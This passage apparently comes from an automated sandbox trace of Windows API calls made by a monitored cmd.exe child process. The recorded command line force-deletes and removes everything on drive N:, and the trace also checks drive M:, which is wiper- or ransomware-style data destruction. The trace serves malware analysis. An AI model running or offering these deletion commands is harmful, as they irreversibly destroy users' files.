_String2="CMDCMDLINE") returned 13 [0064.404] _wcsicmp (_String1="p IN (\"M", _String2="DATE") returned 12 [0064.404] _wcsicmp (_String1="p IN (\"M", _String2="TIME") returned -4 [0064.404] _wcsicmp (_String1="p IN (\"M", _String2="RANDOM") returned -2 [0064.404] _wcsicmp (_String1="p IN (\"M", _String2="HIGHESTNUMANODENUMBER") returned 8 [0064.404] GetProcessHeap () returned 0x6f0000 [0064.404] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x7057e0 | out: hHeap=0x6f0000) returned 1 [0064.404] GetProcessHeap () returned 0x6f0000 [0064.404] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x70aaf8 | out: hHeap=0x6f0000) returned 1 [0064.404] GetProcessHeap () returned 0x6f0000 [0064.404] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x4008) returned 0x70aaf8 [0064.404] GetProcessHeap () returned 0x6f0000 [0064.404] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x70aaf8 | out: hHeap=0x6f0000) returned 1 [0064.405] GetProcessHeap () returned 0x6f0000 [0064.405] HeapFree (in: hHeap=0x6f0000, dwFlags=0x0, lpMem=0x706ae0 | out: hHeap=0x6f0000) returned 1 [0064.405] _wcsicmp (_String1="if", _String2=")") returned 64 [0064.405] _wcsicmp (_String1="FOR", _String2="if") returned -3 [0064.405] _wcsicmp (_String1="FOR/?", _String2="if") returned -3 [0064.405] _wcsicmp (_String1="IF", _String2="if") returned 0 [0064.405] _wcsicmp (_String1="IF/?", _String2="if") returned 47 [0064.405] GetProcessHeap () returned 0x6f0000 [0064.405] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x58) returned 0x703110 [0064.405] GetProcessHeap () returned 0x6f0000 [0064.405] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0xe) returned 0x6fffc0 [0064.406] GetProcessHeap () returned 0x6f0000 [0064.406] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x20) returned 0x7057e0 [0064.406] GetProcessHeap () returned 0x6f0000 [0064.407] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7057e0, Size=0x16) returned 0x701800 [0064.407] GetProcessHeap () returned 0x6f0000 [0064.407] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x701800) returned 0x16 [0064.407] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0064.407] GetProcessHeap () returned 0x6f0000 [0064.407] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x58) returned 0x703170 [0064.407] GetProcessHeap () returned 0x6f0000 [0064.408] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x14) returned 0x7031d0 [0064.408] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0064.408] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0064.408] GetProcessHeap () returned 0x6f0000 [0064.408] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x12) returned 0x7031f0 [0064.408] GetProcessHeap () returned 0x6f0000 [0064.408] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x1c) returned 0x7057e0 [0064.408] GetProcessHeap () returned 0x6f0000 [0064.408] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7057e0, Size=0x14) returned 0x703210 [0064.408] GetProcessHeap () returned 0x6f0000 [0064.408] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x703210) returned 0x14 [0064.409] _wcsicmp (_String1="del", _String2=")") returned 59 [0064.409] _wcsicmp (_String1="FOR", _String2="del") returned 2 [0064.409] _wcsicmp (_String1="FOR/?", _String2="del") returned 2 [0064.409] _wcsicmp (_String1="IF", _String2="del") returned 5 [0064.409] _wcsicmp (_String1="IF/?", _String2="del") returned 5 [0064.409] _wcsicmp (_String1="REM", _String2="del") returned 14 [0064.409] _wcsicmp (_String1="REM/?", _String2="del") returned 14 [0064.409] GetProcessHeap () returned 0x6f0000 [0064.409] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x58) returned 0x703230 [0064.409] GetProcessHeap () returned 0x6f0000 [0064.409] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x10) returned 0x6fffd8 [0064.410] GetProcessHeap () returned 0x6f0000 [0064.410] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x28) returned 0x703290 [0064.411] GetProcessHeap () returned 0x6f0000 [0064.411] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x58) returned 0x7032c0 [0064.412] _wcsicmp (_String1="FOR", _String2=")") returned 61 [0064.412] _wcsicmp (_String1="FOR", _String2="FOR") returned 0 [0064.412] _wcsicmp (_String1="FOR/?", _String2="FOR") returned 47 [0064.412] GetProcessHeap () returned 0x6f0000 [0064.412] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x58) returned 0x703320 [0064.412] GetProcessHeap () returned 0x6f0000 [0064.412] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x44) returned 0x703380 [0064.413] GetProcessHeap () returned 0x6f0000 [0064.413] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x14) returned 0x7033d0 [0064.413] GetProcessHeap () returned 0x6f0000 [0064.413] RtlReAllocateHeap (Heap=0x6f0000, Flags=0x0, Ptr=0x7033d0, Size=0x12) returned 0x7033d0 [0064.413] GetProcessHeap () returned 0x6f0000 [0064.413] RtlSizeHeap (HeapHandle=0x6f0000, Flags=0x0, MemoryPointer=0x7033d0) returned 0x12 [0064.413] _wcsicmp (_String1="/L", _String2="/D") returned 8 [0064.413] _wcsicmp (_String1="/D", _String2="/D") returned 0 [0064.414] _wcsicmp (_String1="/L", _String2="%p") returned 10 [0064.414] _wcsicmp (_String1="/D", _String2="%p") returned 10 [0064.414] _wcsicmp (_String1="/F", _String2="%p") returned 10 [0064.414] _wcsicmp (_String1="/R", _String2="%p") returned 10 [0064.414] _wcsicmp (_String1="IN", _String2="IN") returned 0 [0064.415] GetProcessHeap () returned 0x6f0000 [0064.415] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x12) returned 0x7033f0 [0064.416] _wcsicmp (_String1="DO", _String2="DO") returned 0 [0064.417] _wcsicmp (_String1="rmdir", _String2=")") returned 73 [0064.417] _wcsicmp (_String1="FOR", _String2="rmdir") returned -12 [0064.417] _wcsicmp (_String1="FOR/?", _String2="rmdir") returned -12 [0064.417] _wcsicmp (_String1="IF", _String2="rmdir") returned -9 [0064.417] _wcsicmp (_String1="IF/?", _String2="rmdir") returned -9 [0064.417] _wcsicmp (_String1="REM", _String2="rmdir") returned -8 [0064.417] _wcsicmp (_String1="REM/?", _String2="rmdir") returned -8 [0064.417] GetProcessHeap () returned 0x6f0000 [0064.417] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x58) returned 0x703410 [0064.417] GetProcessHeap () returned 0x6f0000 [0064.417] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x14) returned 0x703470 [0064.418] GetProcessHeap () returned 0x6f0000 [0064.418] RtlAllocateHeap (HeapHandle=0x6f0000, Flags=0x8, Size=0x20) returned 0x7057e0 [0064.420] _wcsicmp (_String1="ELSE", _String2="\n") returned 91 [0064.422] GetFullPathNameW (in: lpFileName="M:", nBufferLength=0x208, lpBuffer=0x36f710, lpFilePart=0x36f4bc | out: lpBuffer="M:\\", lpFilePart=0x36f4bc*=0x0) returned 0x3 [0064.423] wcsncmp (_String1="M:\\", _String2="\\\\.\\", _MaxCount=0x4) returned -15 [0064.427] GetFileAttributesW (lpFileName="M:\\" (normalized: "m:")) returned 0xffffffff [0064.427] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.427] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.428] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.428] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0064.428] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.428] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0064.429] SetConsoleInputExeNameW () returned 0x1 [0064.429] GetConsoleOutputCP () returned 0x1b5 [0064.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.429] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.429] exit (_Code=0) Process: id = "34" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x42009000" os_pid = "0x360" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c if exist \"N:\" del /f /s /q \"N:\" & FOR /D %p IN (\"N:\") DO rmdir \"%p\" /s /q" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 62 os_tid = 0xb90 [0064.542] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x28f814 | out: lpSystemTimeAsFileTime=0x28f814*(dwLowDateTime=0x44939a0, dwHighDateTime=0x1d62400)) [0064.542] GetCurrentProcessId () returned 0x360 [0064.542] GetCurrentThreadId () returned 0xb90 [0064.542] GetTickCount () returned 0x1147945 [0064.542] QueryPerformanceCounter (in: lpPerformanceCount=0x28f80c | out: lpPerformanceCount=0x28f80c*=18467541629) returned 1 [0064.544] GetModuleHandleA (lpModuleName=0x0) returned 0x4a3f0000 [0064.544] __set_app_type (_Type=0x1) [0064.544] __p__fmode () returned 0x770331f4 [0064.544] __p__commode () returned 0x770331fc [0064.544] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4121a6) returned 0x0 [0064.545] __getmainargs (in: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c, _DoWildCard=0, _StartInfo=0x4a414140 | out: _Argc=0x4a414238, _Argv=0x4a414240, _Env=0x4a41423c) returned 0 [0064.545] GetCurrentThreadId () returned 0xb90 [0064.545] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb90) returned 0x60 [0064.545] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0064.545] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0064.545] SetThreadUILanguage (LangId=0x0) returned 0x409 [0064.546] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0064.546] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x28f7a4 | out: phkResult=0x28f7a4*=0x0) returned 0x2 [0064.546] VirtualQuery (in: lpAddress=0x28f7db, lpBuffer=0x28f774, dwLength=0x1c | out: lpBuffer=0x28f774*(BaseAddress=0x28f000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.546] VirtualQuery (in: lpAddress=0x190000, lpBuffer=0x28f774, dwLength=0x1c | out: lpBuffer=0x28f774*(BaseAddress=0x190000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0064.546] VirtualQuery (in: lpAddress=0x191000, lpBuffer=0x28f774, dwLength=0x1c | out: lpBuffer=0x28f774*(BaseAddress=0x191000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0064.546] VirtualQuery (in: lpAddress=0x193000, lpBuffer=0x28f774, dwLength=0x1c | out: lpBuffer=0x28f774*(BaseAddress=0x193000, AllocationBase=0x190000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0064.546] VirtualQuery (in: lpAddress=0x290000, lpBuffer=0x28f774, dwLength=0x1c | out: lpBuffer=0x28f774*(BaseAddress=0x290000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0x70000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0064.546] GetConsoleOutputCP () returned 0x1b5 [0064.547] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.548] SetConsoleCtrlHandler (HandlerRoutine=0x4a40e72a, Add=1) returned 1 [0064.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.548] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0064.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.548] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4141ac | out: lpMode=0x4a4141ac) returned 1 [0064.548] _get_osfhandle (_FileHandle=1) returned 0x7 [0064.548] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0064.549] _get_osfhandle (_FileHandle=0) returned 0x3 [0064.549] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4141b0 | out: lpMode=0x4a4141b0) returned 1 [0064.549] GetEnvironmentStringsW () returned 0x4220f8* [0064.549] GetProcessHeap () returned 0x410000 [0064.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xaca) returned 0x422bd0 [0064.549] FreeEnvironmentStringsW (penv=0x4220f8) returned 1 [0064.549] GetProcessHeap () returned 0x410000 [0064.549] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x4) returned 0x421898 [0064.550] GetEnvironmentStringsW () returned 0x4220f8* [0064.550] GetProcessHeap () returned 0x410000 [0064.550] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xaca) returned 0x4236a8 [0064.550] FreeEnvironmentStringsW (penv=0x4220f8) returned 1 [0064.550] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e714 | out: phkResult=0x28e714*=0x68) returned 0x0 [0064.550] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x0, lpData=0x28e720*=0x0, lpcbData=0x28e718*=0x1000) returned 0x2 [0064.550] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x4, lpData=0x28e720*=0x1, lpcbData=0x28e718*=0x4) returned 0x0 [0064.550] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x0, lpData=0x28e720*=0x1, lpcbData=0x28e718*=0x1000) returned 0x2 [0064.550] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x4, lpData=0x28e720*=0x0, lpcbData=0x28e718*=0x4) returned 0x0 [0064.550] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x4, lpData=0x28e720*=0x40, lpcbData=0x28e718*=0x4) returned 0x0 [0064.551] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x4, lpData=0x28e720*=0x40, lpcbData=0x28e718*=0x4) returned 0x0 [0064.551] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x0, lpData=0x28e720*=0x40, lpcbData=0x28e718*=0x1000) returned 0x2 [0064.551] RegCloseKey (hKey=0x68) returned 0x0 [0064.551] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x28e714 | out: phkResult=0x28e714*=0x68) returned 0x0 [0064.551] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x0, lpData=0x28e720*=0x40, lpcbData=0x28e718*=0x1000) returned 0x2 [0064.551] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x4, lpData=0x28e720*=0x1, lpcbData=0x28e718*=0x4) returned 0x0 [0064.551] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x0, lpData=0x28e720*=0x1, lpcbData=0x28e718*=0x1000) returned 0x2 [0064.551] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x4, lpData=0x28e720*=0x0, lpcbData=0x28e718*=0x4) returned 0x0 [0064.551] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x4, lpData=0x28e720*=0x9, lpcbData=0x28e718*=0x4) returned 0x0 [0064.551] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x4, lpData=0x28e720*=0x9, lpcbData=0x28e718*=0x4) returned 0x0 [0064.552] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x28e71c, lpData=0x28e720, lpcbData=0x28e718*=0x1000 | out: lpType=0x28e71c*=0x0, lpData=0x28e720*=0x9, lpcbData=0x28e718*=0x1000) returned 0x2 [0064.552] RegCloseKey (hKey=0x68) returned 0x0 [0064.552] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b6a [0064.552] srand (_Seed=0x5eb34b6a) [0064.552] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"N:\" del /f /s /q \"N:\" & FOR /D %p IN (\"N:\") DO rmdir \"%p\" /s /q" [0064.552] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c if exist \"N:\" del /f /s /q \"N:\" & FOR /D %p IN (\"N:\") DO rmdir \"%p\" /s /q" [0064.552] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.552] GetProcessHeap () returned 0x410000 [0064.552] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x210) returned 0x4220f8 [0064.552] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x422100, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0064.553] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0064.553] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0064.553] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.553] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0064.553] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0064.553] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0064.553] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0064.553] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0064.553] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0064.553] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0064.553] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0064.553] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0064.553] GetProcessHeap () returned 0x410000 [0064.553] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x422bd0 | out: hHeap=0x410000) returned 1 [0064.553] GetEnvironmentStringsW () returned 0x422310* [0064.553] GetProcessHeap () returned 0x410000 [0064.553] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xae2) returned 0x424c70 [0064.554] FreeEnvironmentStringsW (penv=0x422310) returned 1 [0064.554] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0064.554] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a420640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0064.554] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0064.554] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0064.554] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0064.554] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0064.554] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0064.554] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0064.554] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0064.554] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0064.554] GetProcessHeap () returned 0x410000 [0064.554] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x54) returned 0x4217c8 [0064.554] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x28f4e0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.554] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x28f4e0, lpFilePart=0x28f4dc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x28f4dc*="Desktop") returned 0x25 [0064.554] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0064.555] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x28f25c | out: lpFindFileData=0x28f25c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x425760 [0064.555] FindClose (in: hFindFile=0x425760 | out: hFindFile=0x425760) returned 1 [0064.555] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x28f25c | out: lpFindFileData=0x28f25c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x22a8020, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x22a8020, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x425760 [0064.555] FindClose (in: hFindFile=0x425760 | out: hFindFile=0x425760) returned 1 [0064.555] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0064.555] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x28f25c | out: lpFindFileData=0x28f25c*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x3ff6f00, ftLastAccessTime.dwHighDateTime=0x1d62400, ftLastWriteTime.dwLowDateTime=0x3ff6f00, ftLastWriteTime.dwHighDateTime=0x1d62400, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x425760 [0064.555] FindClose (in: hFindFile=0x425760 | out: hFindFile=0x425760) returned 1 [0064.556] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0064.556] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0064.556] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0064.556] GetProcessHeap () returned 0x410000 [0064.556] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x424c70 | out: hHeap=0x410000) returned 1 [0064.556] GetEnvironmentStringsW () returned 0x424180* [0064.556] GetProcessHeap () returned 0x410000 [0064.556] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xb36) returned 0x425fa0 [0064.556] FreeEnvironmentStringsW (penv=0x424180) returned 1 [0064.556] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a415260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0064.556] GetProcessHeap () returned 0x410000 [0064.556] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x4217c8 | out: hHeap=0x410000) returned 1 [0064.556] GetProcessHeap () returned 0x410000 [0064.556] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0x400e) returned 0x426ae0 [0064.557] GetProcessHeap () returned 0x410000 [0064.557] RtlAllocateHeap (HeapHandle=0x410000, Flags=0x8, Size=0xa0) returned 0x422e50 [0064.557] GetProcessHeap () returned 0x410000 [0064.557] HeapFree (in: hHeap=0x410000, dwFlags=0x0, lpMem=0x426ae0 | out: hHeap=0x410000) returned 1 [0064.557] GetConsoleOutputCP () returned 0x1b5 [0064.557] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a414260 | out: lpCPInfo=0x4a414260) returned 1 [0064.557] GetUserDefaultLCID () returned 0x409 [0064.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a414950, cchData=8 | out: lpLCData=":") returned 2 [0064.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x28f620, cchData=128 | out: lpLCData="0") returned 2 [0064.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x28f620, cchData=128 | out: lpLCData="0") returned 2 [0064.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x28f620, cchData=128 | out: lpLCData="1") returned 2 [0064.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a414940, cchData=8 | out: lpLCData="/") returned 2 [0064.558] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a414d80, cchData=32 | out: lpLCData="Mon") returned 4 [0064.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a414d40, cchData=32 | out: lpLCData="Tue") returned 4 [0064.559] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a414d00, cchData=32 | out: lpLCData="Wed") returned 4 [0064.559] GetLocaleInfoW (in: 